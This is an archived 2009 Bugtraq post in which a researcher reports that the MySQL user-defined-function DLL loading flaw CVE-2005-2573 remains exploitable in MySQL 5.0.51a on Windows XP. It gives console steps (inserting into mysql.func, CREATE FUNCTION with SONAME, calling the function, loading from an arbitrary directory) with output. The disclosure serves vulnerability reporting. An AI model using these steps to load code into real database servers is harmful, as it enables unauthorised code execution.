lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 16 Mar 2009 13:12:25 -0000
From: rahimeh.khodadadi@...il.com
To: bugtraq@...urityfocus.com
Subject: reporting CVE

Hello,

CVE-2005-2573 is reported for MySQL 4.1.x before 4.1.13 and MySQL 5.0
 before 5.0.7. However. I tested this vulnerability in MySQL 5.0.51a on
 Windows xp sp2, and found this version vulnerable too.

According to CVE-2008-4098, that is reported because of an incomplete fix for CVE-2008-4097, i think this vulnerability should be reported again for an incomplete fix.

I tested CVE-2005-2573 in MySQL 5.0.51a and windows XP again and found this vulnerability isn't fixed. Here is my done steps for executing this vulnerability.

Example:  

1) mysql> INSERT INTO mysql.func (name,dl) VALUES ('lib_mysqludf_udf','C:\Program F

iles\MySQL\MySQL Server 5.0\lib/lib_mysqludf_udf.dll') ;

Query OK, 1 row affected (0.00 sec)

 

2) mysql> CREATE FUNCTION lib_mysqludf_udf_info

    -> RETURNS STRING

    -> SONAME 'lib_mysqludf_udf.dll'

    -> ;

Query OK, 0 rows affected (0.02 sec)

 

3) mysql>  select lib_mysqludf_udf_info();

+--------------------------------+

| lib_mysqludf_udf_info()        |

+--------------------------------+

| lib_mysqludf_sys version 0.0.2 |

+--------------------------------+

1 row in set (0.00 sec)

(Also, Saving the dll file in another directory (i.e. E:\..\..\), gives the same result)

 

mysql> delete from  func where name='lib_mysqludf_udf' and dl='C:\Program Files\My

SQL\MySQL Server 5.0\lib/lib_mysqludf_udf.dll' ;

Query OK, 1 row affected (0.00 sec)

 

mysql> INSERT INTO mysql.func (name,dl) VALUES ('lib_mysqludf_udf','E:\project\l

ib_mysqludf_udf\release/lib_mysqludf_udf.dll') ;

Query OK, 1 row affected (0.00 sec)

 

mysql> CREATE FUNCTION udf_arg_count

    -> RETURNS INTEGER

    -> SONAME 'lib_mysqludf_udf.dll'

    -> ;

Query OK, 0 rows affected (0.00 sec)

 

mysql>  select udf_arg_count(1,2,3,4);

+------------------------+

| udf_arg_count(1,2,3,4) |

+------------------------+

|                      4 |

+------------------------+

1 row in set (0.00 sec)


Please verify and send your opion about this.
I 'm waitting your mail.

Regards
Rahimeh.Khodadadi
 Network Security Center of Sharif University of Iran

Powered by blists - more mailing lists